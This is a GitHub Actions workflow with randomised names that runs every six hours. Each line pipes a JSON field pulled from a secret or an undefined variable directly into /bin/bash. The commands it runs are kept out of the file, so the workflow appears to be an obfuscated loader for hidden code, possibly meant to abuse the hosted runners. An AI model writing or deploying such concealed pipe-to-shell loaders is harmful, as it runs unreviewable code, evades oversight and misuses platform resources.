name: baiheizi7182

on:
  workflow_dispatch:
  schedule:
    - cron: '3 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baiheizi7182
        env:
          l0: ${{ secrets.l0 }}
        run: |
          echo $l0 | jq -r .b34604 | /bin/bash
          echo $gfgd52754 | jq -r .va363 | /bin/bash
          echo $ioi26507 | jq -r .hybz1 | /bin/bash
          echo $xobs097 | jq -r .j5703 | /bin/bash
          echo $wglz71 | jq -r .qi27402 | /bin/bash
          echo $m5 | jq -r .j89 | /bin/bash
          echo $monby3 | jq -r .i7 | /bin/bash
          echo $kcswm348 | jq -r .fa9 | /bin/bash

